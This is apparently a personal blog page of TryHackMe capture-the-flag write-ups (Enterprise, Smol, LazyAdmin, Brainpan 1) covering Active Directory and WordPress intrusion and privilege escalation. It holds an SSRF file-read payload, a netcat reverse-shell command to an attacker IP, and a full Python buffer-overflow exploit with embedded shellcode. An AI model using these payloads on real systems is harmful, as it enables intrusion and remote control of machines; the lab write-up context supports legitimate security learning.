Enterprise

Enterprise Challenges Difficulty: Hard Category: Active Directory Initial Access First things go first and the first here is to scan the ip from the scan result we are dealing with a domain controller and the domain name is Enterprise.THM we shall run a script scan hopefully we might found any known vulnerability but no there isn’t 😑 So now we want to find any credentials to gain our initial access to this DC as this DC are running a web server on port 80 it’s a good idea to discover it noting important in this page but it might have another pages another dead end no problem let’s continue another interesting service are running in this DC which is smb can we access any share in it🤔 yes there is more than one share we can access as guest one of them is users share with a remark Users share. Do not Touch we are able to connect to it using smbclint but to go faster we will use smbmap To narrow our search smbmap -H 10.10.226.245 -u 'a' -p '' -r 'Users' even smbap showed that we have read permission i got many NT_STATUS_ACCESS_DENIED listing so i moved to another path. if you searched with the domain name in github you will find an organization in the people section there is a user called Nik-enterprise-dev which has only one repo that contains a script called mgmtScript.ps1 in the commit history of this ps script there is a user and password we can connect with it to make sure that it’s still working and it is in the home directory of this user there is 2 files but they was password protected we can try to use this user to get user spns using impacket and we got a hash from this using hashcat we were able to crack it and get bitbucket creds using rdb we got into his desktop and found the first flag Privilege Escalation so we don’t have much to do with tis user one of the ways to escalate window privilege is Unquoted Service Path which is one of the easiest ways in my mind wmic service get name,pathname bingo we found an interesting one here so let’s create our revers shell using msfvenom after moving our shell to the program file we need to start this service Grate news we escalated our privilege 🎉 and here is your flag😉

CTF Writeups · 2025-04-18

Smol

Smol Challenges Difficulty: Medium Category: Privilege Escalation Initial Access Get a cup of coffee ☕ first this will be a little bit long walkthrough 😊 From the end of the page on http://www.smol.thm or from wappalyzer this website is using WordPress so start to scan it with wpscan wpscan --url [http://www.smol.thm](http://www.smol.thm/) from the scan result there is a plugin called jsmol2wp where did i here this name before🤔 Yes this plugin is vulnerable to SSRF wpscan let’s try this payload on our smol.thm http://www.smol.thm/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=getRawDataFromDatabase&query=php://filter/resource=../../../../wp-config.php in the wp-config.php file we found a credentials for a user called wpuser /** Database username */ define( 'DB_USER', 'wpuser' ); /** Database password */ define( 'DB_PASSWORD', 'kbLSF2Vop#lw3rjDZ629*Z%G' ); from the comment section we can get to a login page and the creds are working in this file note the first important line that refaces to Hello Dolly plugin just for fun 😂 back to our work we should review hello.php file http://www.smol.thm/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=getRawDataFromDatabase&query=php://filter/resource=../../hello.php in this code we can see a part of the code that uses eval which is a vulnerable function but the reset of the line is base64 encoded from the decoding result the statement is if (isset($_GET["cmd"])) { system($_GET["cmd"]); } adding the cmd parameter we can execute system commands now we want to get a shell from this busybox nc 10.11.130.37 4444 -e sh and we got our initial access 🎉 Privilege Escalation python3 -c 'import pty; pty.spawn("/bin/bash")' As we know that there is a database running let’s try to get another user creds from it Cracking this hashes with john we got a password that is obviously for the user diego what i had checked: ❌ sudo -l ❌ /cat /etc/crontab ❌ suid ❌ capabilities in the home of the user think you can find an ssh key that you can use to connect in gege home there is a .zip file that you can access as other but this file is password protected you can use john to crack this file inside this compressed file there is a wp-config.php file that has the credential of xavi maybe it’s our lucky user finally we escalated our privilege 😮‍💨 Great to see you at the end of this rich challenge😊. keep it up 💪

CTF Writeups · 2025-04-16

LazyAdmin

LazyAdmin Challenges Difficulty: Easy Category: Privilege Escalation Initial Access As usual we will start with with nmap to scan the machine There is 2 open ports 22, 80 so let’s open this webpage ok it’s an apache server but we want to fuzz this ip to find more interesting pages great there is a directory called content going deeper in this directory we found several interesting pages the /as one is a login page but we don’t have credentials yet ;) now this is an interesting one as we can find a working creds from this backup and we got a user called manager with admin role and a hash for his password and we got the password browsing this site we can find a Media Center tab with a file upload just upload a reverse shell and you will get a shell but remember to change the .php to .php5 or any other extension Privilege Escalation Great we got initial access with a www-data now we need to escalate to root checking our permissions we saw that there is a file that we can run as sudo and we also has write permission to this file so overwrite it with another shell and run as sudo and you will get a root shell

CTF Writeups · 2025-04-16

Brainpan 1

Brainpan 1 Challenges Difficulty: Hard Category: Revers Walkthrough Stating with nmap to scan the machine we found a service called abyss on port 9999 a web server running on port 10000 Opening it returns a page that has nothing interested let’s use dirb to discover directories opening /bin we found an .exe file called Brainpan.exe lets try to download it let’s reverse this file using Ghidra so this is the one running on port 9999 and this program takes one input from the user and returns ACCESS DENIED or ACCESS GRANTED Friendly advice don’t waste yore time to get the correct password as its actually just a printed string but as i have wasted my time :) so if you sent the string shitstorm that will return ACCESS GRANTED actually this is the vulnerable part of the code as strcpy does not check bounds. so If input is longer than 520 bytes, it will overflow local_20c now we want to run this exe inside a debugger to cause a BO and get the address that would be in the eip to start our exploit i will use Immunity Debugger to do so created a pattern using msf-pattern_create to find the exact offset After a looooooooooong time i realized that ncat has a max buffer size of 511 🙂 let’s use python import socket # Target details TARGET_IP = "127.0.0.1" TARGET_PORT = 9999 # Payload (1000 'A' characters) payload = "A" * 1000 # Create a TCP socket s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: # Connect to the target s.connect((TARGET_IP, TARGET_PORT)) print("[+] Connected to the target") # Receive banner (if any) response = s.recv(1024) print("[+] Received:", response.decode(errors="ignore")) # Send the payload s.sendall(payload.encode()) print("[+] Sent 1000 bytes") # Receive response (if any) response = s.recv(1024) print("[+] Server response:", response.decode(errors="ignore")) except Exception as e: print("[!] Connection failed:", str(e)) finally: s.close() print("[+] Connection closed") and finaly it’s a crash As we successful caused a BO we will use mona script inside Immunity Debugger to find a jmp esp instruction address created a reverse shell using msfvenom to connect to my local ip throw port 4444 and modified the script import socket import struct # Target details TARGET_IP = "127.0.0.1" TARGET_PORT = 9999 # Payload (1000 'A' characters) offset = b"A"*524 eip= b'\xf3\x12\x17\x31' #311712F3 buf = b"" buf += b"\xd9\xc1\xba\x43\xbc\xeb\x48\xd9\x74\x24\xf4\x5d" buf += b"\x31\xc9\xb1\x52\x31\x55\x17\x03\x55\x17\x83\x86" buf += b"\xb8\x09\xbd\xf4\x29\x4f\x3e\x04\xaa\x30\xb6\xe1" buf += b"\x9b\x70\xac\x62\x8b\x40\xa6\x26\x20\x2a\xea\xd2" buf += b"\xb3\x5e\x23\xd5\x74\xd4\x15\xd8\x85\x45\x65\x7b" buf += b"\x06\x94\xba\x5b\x37\x57\xcf\x9a\x70\x8a\x22\xce" buf += b"\x29\xc0\x91\xfe\x5e\x9c\x29\x75\x2c\x30\x2a\x6a" buf += b"\xe5\x33\x1b\x3d\x7d\x6a\xbb\xbc\x52\x06\xf2\xa6" buf += b"\xb7\x23\x4c\x5d\x03\xdf\x4f\xb7\x5d\x20\xe3\xf6" buf += b"\x51\xd3\xfd\x3f\x55\x0c\x88\x49\xa5\xb1\x8b\x8e" buf += b"\xd7\x6d\x19\x14\x7f\xe5\xb9\xf0\x81\x2a\x5f\x73" buf += b"\x8d\x87\x2b\xdb\x92\x16\xff\x50\xae\x93\xfe\xb6" buf += b"\x26\xe7\x24\x12\x62\xb3\x45\x03\xce\x12\x79\x53" buf += b"\xb1\xcb\xdf\x18\x5c\x1f\x52\x43\x09\xec\x5f\x7b" buf += b"\xc9\x7a\xd7\x08\xfb\x25\x43\x86\xb7\xae\x4d\x51" buf += b"\xb7\x84\x2a\xcd\x46\x27\x4b\xc4\x8c\x73\x1b\x7e" buf += b"\x24\xfc\xf0\x7e\xc9\x29\x56\x2e\x65\x82\x17\x9e" buf += b"\xc5\x72\xf0\xf4\xc9\xad\xe0\xf7\x03\xc6\x8b\x02" buf += b"\xc4\x96\x4b\x0c\x15\x01\x4e\x0c\x04\x8d\xc7\xea" buf += b"\x4c\x3d\x8e\xa5\xf8\xa4\x8b\x3d\x98\x29\x06\x38" buf += b"\x9a\xa2\xa5\xbd\x55\x43\xc3\xad\x02\xa3\x9e\x8f" buf += b"\x85\xbc\x34\xa7\x4a\x2e\xd3\x37\x04\x53\x4c\x60" buf += b"\x41\xa5\x85\xe4\x7f\x9c\x3f\x1a\x82\x78\x07\x9e" buf += b"\x59\xb9\x86\x1f\x2f\x85\xac\x0f\xe9\x06\xe9\x7b" buf += b"\xa5\x50\xa7\xd5\x03\x0b\x09\x8f\xdd\xe0\xc3\x47" buf += b"\x9b\xca\xd3\x11\xa4\x06\xa2\xfd\x15\xff\xf3\x02" buf += b"\x99\x97\xf3\x7b\xc7\x07\xfb\x56\x43\x27\x1e\x72" buf += b"\xbe\xc0\x87\x17\x03\x8d\x37\xc2\x40\xa8\xbb\xe6" buf += b"\x38\x4f\xa3\x83\x3d\x0b\x63\x78\x4c\x04\x06\x7e" buf += b"\xe3\x25\x03" nop=b'\x90'*50 eof=b"\xCC" payload= offset+eip+nop+buf+nop+eof # Create a TCP socket s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # Connect to the target s.connect((TARGET_IP, TARGET_PORT)) print("[+] Connected to the target") # Receive banner (if any) response = s.recv(1024) # Send the payload s.sendall(payload) print("[+] Sent 1000 bytes") and this worked correctly and got a reverse shell now we want to send it to the actual server remember to recreate the reverse shell with your ip and we got a shell but it seems that we are inside Sandbox/Evasion Environment now we know that we can run /home/anansi/bin/anansi_util with sudo this bin gives us 3 commands that we can run network proclist manual from gtfobins we know that we can get a shell from man using !/bin/sh

CTF Writeups · 2025-04-15

AhmedZaid

Contact

THM